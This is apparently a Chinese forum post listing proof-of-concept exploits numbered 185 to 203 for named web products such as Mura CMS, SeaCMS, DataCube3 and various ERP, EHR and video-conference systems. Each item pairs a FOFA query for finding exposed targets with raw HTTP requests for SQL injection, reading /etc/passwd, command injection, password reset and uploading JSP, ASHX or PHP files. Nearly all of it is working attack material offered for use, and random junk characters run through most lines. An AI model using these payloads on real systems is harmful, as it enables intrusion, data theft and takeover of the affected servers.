& ]" k) \- O1 ^
insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')
. b+ @9 c; ?/ d4 |1 }5 L7 D
( d8 \) Z$ g0 T: A+ |' _0 |* |+ E1 F8 `* z7 y2 Q
185. 瑞友天翼应用虚拟化系统SQL注入/ x. J7 ]* t; b6 @- O8 V. \$ n
version < 7.0.5.10 T- {5 j0 v* d2 g! p
FOFA:app="REALOR-天翼应用虚拟化系统"
) i9 _2 l: z% ^ J( d0 N* uGET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
3 p9 Q% I7 [, K$ t; i N2 bHost: host
( \0 G0 V5 S, x$ b T
6 _) Z& `1 Y; R0 e1 }/ p6 X; m3 h6 X* e0 v# l. W3 V+ }
186. F-logic DataCube3 SQL注入6 E5 A$ r/ S7 ]7 `
CVE-2024-31750
; C7 N5 R' h6 h6 d, PF-logic DataCube3是一款用于光伏发电系统的紧凑型终端测量系统( x( b2 T4 {# A; T
FOFA:title=="DataCube3"
& ]) J7 W: ?& f& p' P, {; n1 lPOST /admin/pr_monitor/getting_index_data.php HTTP/1.1
0 v& c$ E6 i$ p4 v _0 mHost: your-ip
# u# y4 @2 D! \3 R2 F! H( ?" NUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0) Z0 ?/ Z' l/ r% [' ]" U
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.88 H2 U0 j7 @+ i; X
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
. j; a9 U) G8 e0 Z8 lAccept-Encoding: gzip, deflate- \1 v/ F+ Y" y1 u, m/ y1 W
Connection: close! X* G8 h' p/ C2 ?3 K/ e c7 B2 I1 L# y
Content-Type: application/x-www-form-urlencoded
9 I1 S, N6 V6 }, c: s# R2 c3 H, J2 _1 O c
req_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450& D3 f1 f# }; j3 ^! X) d* ~! w
2 D( C7 m. _8 d) k# B- X
$ R' k3 l; z: W; [187. Mura CMS processAsyncObject SQL注入
2 [5 E; G/ n* F. U- |CVE-2024-32640) B: ?! ^& p4 O$ X$ w7 D
FOFA:"Mura CMS" s9 M2 o& ~& `8 h# G% B
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1% {6 {* Q+ O h- H
Host: your-ip
) P- B/ L8 F( M5 T6 d& o0 \' S$ nContent-Type: application/x-www-form-urlencoded1 h7 w+ Y# s7 h8 n5 h! Y9 K
4 {9 L; X. U6 P: C; m1 W, Z) `8 j
3 @" E; y; }& f' D5 G* {$ ]
object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=18 M7 q, Z. ?8 r- I
- o( C' t4 [! Q8 U( {* L7 T w
; w( ^" x' _6 E; m
188. 叁体-佳会视频会议 attachment 任意文件读取/ S. g% V* g& f% q( v
version <= 3.9.7
% a0 S$ o0 l1 u& z: B, S% ?FOFA:body="/system/get_rtc_user_defined_info?site_id"
6 K% W' v, p3 g) ? k- O* rGET /attachment?file=/etc/passwd HTTP/1.15 ], g3 s v6 H6 ~7 M
Host: your-ip
) J9 T/ G! D6 u6 e: bUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36+ v2 s A2 ]. Z( N* y6 s: T0 U( o9 O4 @% \
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7' i! t. h, Y W2 n- ~/ V
Accept-Encoding: gzip, deflate1 C) e7 b, \3 A; k. L% D' z: o
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8& n5 A+ u) l, c- O/ @
Connection: close) U4 Y; z, b: ~; x
( |* {. K- ^0 L5 N" ~6 `
/ b ?: k& U# ]
189. 蓝网科技临床浏览系统 deleteStudy SQL注入
# @# s7 B1 b7 K6 bFOFA:app="LANWON-临床浏览系统"
$ A5 t* s) R$ q% QGET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
9 m% U: T8 w e- ?0 FHost: your-ip
( {# L' c8 h5 s0 N5 v$ HUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
7 ^8 r7 @6 ]0 cAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+ T ~' j/ U- v7 D/ I4 R& BAccept-Encoding: gzip, deflate- K, g- n; X0 w) d V g
Accept-Language: zh-CN,zh;q=0.9
2 @ T- f' A: D2 sConnection: close! X/ e9 K! N7 W
0 K7 g5 J9 S- X. {: i% f+ S3 d( v' `' j; i/ f3 F" \" U$ V; O
190. 短视频矩阵营销系统 poihuoqu 任意文件读取
# A& Y; z2 O$ k) pFOFA:title=="短视频矩阵营销系统"
5 }; H* o! ^* bPOST /index.php/admin/Userinfo/poihuoqu HTTP/20 v: ~ M) |! q( V
Host: your-ip
9 R" K* a1 }& L" S1 zUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
; I+ [. S" E! z: WAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9& x3 [5 x' r% g5 m" l
Content-Type: application/x-www-form-urlencoded
% }. ^/ e0 D& r/ G& R7 S- kAccept-Encoding: gzip, deflate
+ ?/ @3 R# t5 D+ d: P$ x: Y6 kAccept-Language: zh-CN,zh;q=0.9
; s8 v1 Q% Y4 O. S% `* ~5 G1 E. ^
poi=file:///etc/passwd
# _/ p' c1 ]# g( Q( a9 p* k7 r( h
( J& ?; U5 K7 i8 |
191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入
/ I# H! e1 U0 i, tFOFA:body="/CDGServer3/index.jsp"2 A# _6 q. W2 j. [: w/ d
POST /CDGServer3/js/../NavigationAjax HTTP/1.1
- q: z' M6 S, AHost: your-ip
$ w7 R" |1 i. C- R/ ZUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.366 q8 i9 R3 O% s8 r9 D/ o$ k
Content-Type: application/x-www-form-urlencoded3 f D( o s3 ]7 U7 a
' y. {3 t9 V* i6 V% ~command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=
( w# q9 E1 `+ e. z2 y. ~7 U
# l. q$ r* [7 f$ b0 R5 G6 }% J; U8 E# P* u
192. 富通天下外贸ERP UploadEmailAttr 任意文件上传1 p$ E, M3 q+ } g* w2 T
FOFA:title="用户登录_富通天下外贸ERP". H0 ?+ q9 R) d8 `4 h3 I# M% V- H3 t
POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1' U* N( ?- L K2 Z' m' q5 i. A
Host: your-ip9 i8 g. P% ]' y: C( R3 q
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36, Z0 w. _) Y6 L5 s, d( w/ e- n
Content-Type: application/x-www-form-urlencoded$ f( U: z% I( p
9 q1 R$ f2 Y2 g9 Z
" V: `8 ]( ?" B
<% @ webhandler language="C#" class="AverageHandler" %># G' @ L5 t% u, M
using System;) E" S4 \9 g. y& h0 `2 r5 u
using System.Web;
, U4 e4 E" V+ H8 Gpublic class AverageHandler : IHttpHandler
9 L9 a# T& m( K0 |, R2 W{
0 q+ P& O7 a0 z ]/ Wpublic bool IsReusable
6 e: q9 o9 ^8 Q: }9 _{ get { return true; } }* U6 P! x* R" F" q2 L: d
public void ProcessRequest(HttpContext ctx)
7 a# n% N* b7 r{$ f, F9 P5 z. t. j! v }8 ~
ctx.Response.Write("test");8 D. @' Y+ E8 X9 J; F
}
" Z( H7 C {5 Q} a3 E8 M2 h8 U8 a5 v. F, j
/ a- K k4 E) l1 y' o
2 W; W& k3 t& Y% f- Y! F, n193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行$ e$ \3 Q) M( X% F
FOFA:body="山石云鉴主机安全管理系统"7 x2 o+ P4 O" c6 `* D o
GET /master/ajaxActions/getTokenAction.php HTTP/1.1
6 X$ w, Y- h5 C0 W; ]Host:
8 a J4 G3 `4 j6 l, ]Cookie: PHPSESSID=2333333333333; v& ?8 y) u: H
Content-Type: application/x-www-form-urlencoded
- J: @4 X& ^/ o6 e4 r2 M2 HUser-Agent: Mozilla/5.0% c' c8 o, s+ ^9 `; Q$ O
7 W2 h: t2 h3 O- c4 c% v4 L
3 ?/ z6 D1 H0 l. i
POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.16 U# O3 w& R U, u0 `! z. i
Host:
. N: P P* L4 v. |User-Agent: Mozilla/5.08 W# W0 D! w3 f& Q; A
Accept-Encoding: gzip, deflate
. E5 k3 O+ G+ C! kAccept: */*4 w; e# r( D. }; [
Connection: close4 ~ D! b( l5 W' V& C
Cookie: PHPSESSID=2333333333333;
& ]+ s$ ~4 s; J) {, oContent-Type: application/x-www-form-urlencoded
$ q+ c% i; S* p' ~3 c7 RContent-Length: 84, v3 _/ [; T" | g4 u; Q
2 j, ]: `6 z' Y+ C. X+ \/ iparam=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')
; c; e# F+ M3 x8 j! W N
5 p5 ]) O1 \ @/ @/ y* ?$ J3 c1 g) p$ o, @9 B2 x
GET /master/img/config HTTP/1.11 I9 ~6 n2 Z- N) W+ R
Host:( m Z- c5 S8 E& t3 X
User-Agent: Mozilla/5.0" y2 H" z5 K6 J
/ [% S, u! g U4 m. n, R4 Z4 }
& H8 T, `: W0 m1 |* l" d
194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传
3 g- Y/ `1 t# EFOFA:app="FE-协作平台"访问 /servlet/uploadAttachmentServlet 有返回则漏洞存在# F4 a1 ~% ]% G: z
% R; U" f( d! T; q5 H0 o+ i& j
POST /servlet/uploadAttachmentServlet HTTP/1.1% Q a) [) L. u" I$ G
Host: host
# f* b0 G% T o* V( D, n& H- _2 h5 lUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
% _- t4 ?2 U5 K% BAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
0 w3 g+ D M, ?' v7 WAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
. W8 D2 F6 C/ b' I- uAccept-Encoding: gzip, deflate
m. J4 @5 @2 f/ e: ~Connection: close
/ E- } @0 _7 [; r; _( p, {Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk3 n/ A! W l* n& r& C Y- s/ ?$ L& ~
------WebKitFormBoundaryKNt0t4vBe8cX9rZk8 t5 g: J0 c3 K' Q1 g# n8 \
5 F& ~6 q2 |$ {: O' I# uContent-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"
& Q1 Q7 O( w- W' [Content-Type: text/plain
0 ^! P0 @5 G9 X4 o8 z3 `<% out.println("hello");%>
0 @; C9 B) e$ T5 I8 }------WebKitFormBoundaryKNt0t4vBe8cX9rZk
/ z, T, B `; y7 L' [5 _$ K- cContent-Disposition: form-data; name="json"2 W$ v- ~0 m0 \0 X& z' y
{"iq":{"query":{"UpdateType":"mail"}}}
3 N$ ]! L0 G9 i------WebKitFormBoundaryKNt0t4vBe8cX9rZk--
4 z$ s% ?" c, k. _4 ]. c$ v/ i6 [# B6 N
' S7 [2 H/ z; |8 f1 n% t9 c195. 飞鱼星上网行为管理系统 send_order.cgi命令执行
6 A- R* Z9 ?+ D* L* OFOFA:title=="飞鱼星企业级智能上网行为管理系统
* W! }7 B; v6 m w% |5 R( wPOST /send_order.cgi?parameter=operation HTTP/1.1
& t! V, ^, b7 f( i. rHost: 127.0.0.1+ v# \" j p5 l+ j6 u* I
Pragma: no-cache
: i( r8 E" B1 OCache-Control: no-cache
$ _' `! V( e# A+ J5 e3 T% iUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 \5 W+ P0 t8 H
Accept: */*$ r3 p( @, q% ?# H
Accept-Encoding: gzip, deflate& g4 ]( s* q/ u5 s7 j! z) @
Accept-Language: zh-CN,zh;q=0.9: l% J( T8 `) g+ {, R
Connection: close
6 `5 {, |$ N& q$ R+ i$ K! AContent-Type: application/x-www-form-urlencoded
- X( R7 D, [: T6 }& i" sContent-Length: 68
) ]* D+ v0 k5 p$ t1 S
% @# h. M5 W3 ~{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}
1 t! \ O! R9 m( s# j- m. |. u+ Q- m" g6 l& z
! C# W, j( S) S, v; y/ ^. g/ S
196. 河南省风速科技统一认证平台密码重置# s" z0 R& l# E) q8 f2 B( X
FOFA:body="/cas/themes/zbvc/js/jquery.min.js"
; c1 n" P- `, {" C' QPOST /cas/userCtl/resetPasswordBySuper HTTP/1.1
- \- `: p4 `2 a/ x+ eUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
8 T# W$ N/ N* d }+ L. YContent-Type: application/json;charset=UTF-8% A. M' }5 `) w
X-Requested-With: XMLHttpRequest/ c; c0 A% [# q
Host:: x3 c) ^7 @0 ]+ b* C: j9 S
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
# r" ?1 i+ p; cContent-Length: 455 g2 P% U1 S. \& r b- _; k9 i
Connection: close
% `* |4 }3 l/ y! f' ^
" z6 O' w3 e2 d, Z9 ?4 A% [{"xgh":"test","newPass":"test666","email":""}5 q f8 E* w8 M( ?
; G% A9 o3 @) n
' z* S8 _5 ~9 Q7 h# Q. z
) A9 i5 \7 d6 I$ y! H% Q
197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入9 A% Z; h% D( y; A0 I* Q/ g
FOFA:app="浙大恩特客户资源管理系统"
1 _$ {) z7 ^* ]3 T$ f! eGET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1) t3 n, T P5 P9 n
Host:
8 w6 E9 c$ w' E nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36" {+ C' ^; Y! w1 | ^
Accept-Encoding: gzip, deflate; Q* F( }" s5 T Z* R0 e: v
Connection: close
! l; Z# X9 M1 L7 l" Q2 `& l: @! o, h' y$ y# }
( O$ V; ~4 |4 G9 ?% }
* i" k8 a) N% [# e- t198. 阿里云盘 WebDAV 命令注入$ s4 ~, P0 z9 Q8 {( E9 |0 P& V! s8 J
CVE-2024-29640+ g, C1 l" D) c' I( [' I. X
GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1
! j1 G* s# R- e" ICookie: sysauth=41273cb2cffef0bb5d0653592624cf64
! l/ Q* U( ?. b- [& [7 BAccept: */*
$ |9 b; O$ S, z: j8 K7 gAccept-Encoding: gzip, deflate$ v* H! | K5 t0 d/ I8 T
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
# v$ n. O! L2 a; T4 e* ^/ P. zConnection: close" M+ y5 C: ]* n& P8 i
0 V2 e# L+ f8 h8 D z5 X' ?' y+ `3 d. n
199. cockpit系统assetsmanager_upload接口 文件上传5 q6 J( h8 x; ~* v' i% e
5 y& f' a8 A, P! t S7 B& }) w- M( b3 j1.执行poc进行csrf信息获取,并获取cookie,再上传访问得到结果:) }6 I9 t+ y8 F8 F, m
GET /auth/login?to=/ HTTP/1.1: H i e0 _5 K+ B( W% D T H) Z
D7 _5 a8 ?7 w4 P+ `
响应:200,返回值:csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw". Y4 M* K q6 V8 }' M$ T6 _
0 n4 o$ Y9 g1 z" k
2.使用刚才上一步获取到的jwt获取cookie:
; [( H2 Y# P2 c# F+ Y/ @; g, Z' z& A9 \6 H4 V
POST /auth/check HTTP/1.1+ |& [& n0 D2 t- V/ X6 I
Content-Type: application/json
7 E, N$ D4 C, f' m/ C; v; L3 ]/ E# h3 D8 Y0 L! C
{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}; ?2 ~8 J1 R% I2 v
$ w. X7 f, e5 q* b
响应:200,返回值:
! T) D$ \2 @' O2 s5 _9 t) U! I- PSet-Cookie:mysession=95524f01e238bf51bb60d77ede3bea92: path=/& n! E+ `5 v2 Q$ D8 m ~2 X, y
Fofa:title="Authenticate Please!"
7 E2 {2 {# _3 u r+ ~+ MPOST /assetsmanager/upload HTTP/1.1
6 Z. E4 V- v C' N8 s; FContent-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3" ~. Y" E. ~2 ]* y b) x8 [( M
Cookie: mysession=95524f01e238bf51bb60d77ede3bea92
* H" M2 u& S5 K& r' V9 h3 C4 J* w+ ?* ^5 {3 ^8 X6 X. O
-----------------------------36D28FBc36bd6feE7Fb31 ?8 f% |1 q; \2 S
Content-Disposition: form-data; name="files[]"; filename="tttt.php"
y7 ]! d- w/ W) n& iContent-Type: text/php6 x# v% O$ e/ T0 S- ?
1 u* @- ]8 z# T ~: q# c( h$ H7 M<?php echo "tttt";unlink(__FILE__);?>
9 W: b! i' Y2 u5 l; l8 |) ]8 j-----------------------------36D28FBc36bd6feE7Fb3
, n# M/ H1 r: V% X* C3 j' u4 v9 @Content-Disposition: form-data; name="folder"
, d5 A3 d7 z+ I; ?8 ~: g
+ x* q7 P$ L% o+ [7 K7 a-----------------------------36D28FBc36bd6feE7Fb3--
! t/ _+ B# q% |( x8 O
' q; e6 V! S/ v
7 d1 V, L" o1 H4 G/storage/uploads/tttt.php
0 V9 q9 v4 d' B8 Z# v6 ^8 B0 ^4 \2 t) A) }1 Y( z
200. SeaCMS海洋影视管理系统dmku SQL注入' `( Y! `8 m& F
FOFA:app="海洋CMS"- I8 o8 W7 w5 J9 N2 m8 `: m! G
GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1# |6 i9 K$ d4 o! b5 Y! e
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
2 m; F& t2 B$ S" |7 n- Z6 `Upgrade-Insecure-Requests: 1( R' Q8 L& m$ l2 V" @
Cache-Control: max-age=02 j3 o9 K& i1 U0 N
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.77 j" t2 Y8 ? b/ v7 a2 Z
Accept-Encoding: gzip, deflate" b# a8 @. B% @, M+ Y
Accept-Language: zh-CN,zh;q=0.93 H. U5 g8 ~0 V+ |4 b$ a
5 u r4 J! `# n, C0 ]) [
* n" f# r( L8 J( P/ T& x4 J( G201. 方正全媒体新闻采编系统 binary SQL注入
" o; U' U7 O$ L, [: [FOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统": D# h* x! t) g: @/ a
POST /newsedit/newsplan/task/binary.do HTTP/1.17 n6 o' i3 y9 L
Content-Type: application/x-www-form-urlencoded
9 k- O2 X5 G% T& ]Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
8 {0 L+ z7 A# P1 G1 `6 o6 BAccept-Encoding: gzip, deflate8 V7 d# \4 W L4 N! N, f
Accept-Language: zh-CN,zh;q=0.9! {5 V- L a$ t9 S a# T; L# j( z
Connection: close
7 J/ N0 d) ~7 s: k2 ~4 {+ _' C0 U' f x
TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1
. H! M6 A7 f0 A; V! V3 K) l _" S9 x5 v" }: I9 o
& F0 S1 A; k0 c: n X9 n202. 微擎系统 AccountEdit任意文件上传
% E% C- @0 ^2 i& P$ l" s1 zFOFA:body="/Widgets/WidgetCollection/"/ q7 P' m& V& A" ?. i
获取__VIEWSTATE和__EVENTVALIDATION值
7 ]# u0 T- W) L" b( mGET /User/AccountEdit.aspx HTTP/1.1* c' u5 f3 M4 N2 a
Host: 滑板人之家- e: h) U' C6 Y1 f1 }/ P
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31
# P9 R( }/ _6 l. fContent-Length: 0 _7 g$ @& [& |) C2 P! ^) U
. E) o+ p' X; C1 [
+ _+ X. i. q' X. K4 J C, R
替换__VIEWSTATE和__EVENTVALIDATION值
, c8 |- H3 A. H) g/ Q* XPOST /User/AccountEdit.aspx HTTP/1.1
2 U3 ^ E _; C" dAccept-Encoding: gzip, deflate, br
& S5 y$ o; q4 ]5 E+ x0 \# eContent-Type: multipart/form-data;boundary=---------------------------786435874t385875938657365873465673587356870 ]# _$ i: y2 e7 v* [: X& L; ]
# y; j4 Q; _- \, M: a-----------------------------786435874t38587593865736587346567358735687 O& A. [5 \/ ?0 S
Content-Disposition: form-data; name="__VIEWSTATE"( u$ V- q6 d) D
9 Y" ]7 g. @9 }+ N__VIEWSTATE
' g/ R5 u! ]5 p9 z7 C5 L, B-----------------------------786435874t38587593865736587346567358735687
+ ^6 \) k: R) ?3 wContent-Disposition: form-data; name="__EVENTVALIDATION"
- B0 W2 Z( S* e2 f6 V& D5 W" L- j" C% h2 T
__EVENTVALIDATION( k$ \* s i3 l+ l5 }& D
-----------------------------786435874t38587593865736587346567358735687* l* m" A \! R% @" @
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"
& ^. n6 r- x& \; GContent-Type: text/plain4 }( m+ Y: s \$ m/ [; k) M
# A( f4 W% r# \& h# F- _Hello World!
0 Y5 F! J6 m) k( d4 Z. q, A! \" h-----------------------------786435874t38587593865736587346567358735687
/ P8 y }5 l( eContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload". |( B' z, l/ a8 T$ s0 ?
% Z6 B( q! v+ h+ ^$ M" r
上传图片3 M' o; s: z" X: [0 q" B% z# J* g
-----------------------------786435874t38587593865736587346567358735687
+ r9 ?# b! d# ~Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"
6 {5 z' Z/ z; J* u5 ^
( K+ k8 L" y. i: x! U6 T+ t$ {8 z/ W" Z
-----------------------------786435874t38587593865736587346567358735687
9 a+ R, S0 G0 V, g: w8 aContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"8 p9 O, L4 h! k2 q! _: Z5 `+ k
" w4 E" u: c: d
- c: S7 [0 j! c- G- b4 C-----------------------------786435874t38587593865736587346567358735687--- ~5 A0 T# o0 @; b3 T! h! R! ^' G
2 Z: Y/ i3 ?% N y$ |; H _
- S1 X9 B" B3 C5 T: S7 N5 h# D! h/_data/Uploads/1123.txt8 a) z- i2 [# [+ n& n; l
; v( W$ H4 Q: b& N$ b2 K
203. 红海云EHR PtFjk 文件上传: x5 \" _6 w% r2 y! J
FOFA:body="RedseaPlatform"5 R: l1 T+ Z" z9 k' R
POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1
& [) p( O4 J4 Q/ z) EHost: x.x.x.x
: N2 r5 U2 F! J6 h. P* b6 dAccept-Encoding: gzip
4 T3 l/ Q/ b& o: ?2 f$ B, c6 b- vUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.151 U1 S- N% Q: Z0 j; S
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4) h5 H# D3 ?# |, S' |) R+ x8 G
Content-Length: 210. C/ \7 k' P' R$ i; t a
: e9 x; j0 W7 j4 b, }& ~9 c% i" ?
------WebKitFormBoundaryt7WbDl1tXogoZys4
9 p1 ~ P( D+ U* a% y( _$ f# bContent-Disposition: form-data; name="fj_file"; filename="11.jsp"
6 v9 }/ i. T$ E- I8 i$ _Content-Type:image/jpeg0 ]" k; t( g4 p' @' R
; z- u! Q* F; g) r<% out.print("hello,eHR");%>
! O9 y4 S5 g1 k------WebKitFormBoundaryt7WbDl1tXogoZys4--
0 \& M) E& T* f- t @/ o
* l% L2 _, ^9 @$ e& C ' T+ j9 p9 c ?0 f
* K' ]0 z- C1 m) A+ Q, x3 r5 a/ \3 Z1 X" a F8 @0 Q2 _; I1 q. G
8 z6 \% ]8 _9 K) j7 U! e
3 V0 j L$ T, l
|
发表于 2024-6-5 14:31:29
收藏
支持
反对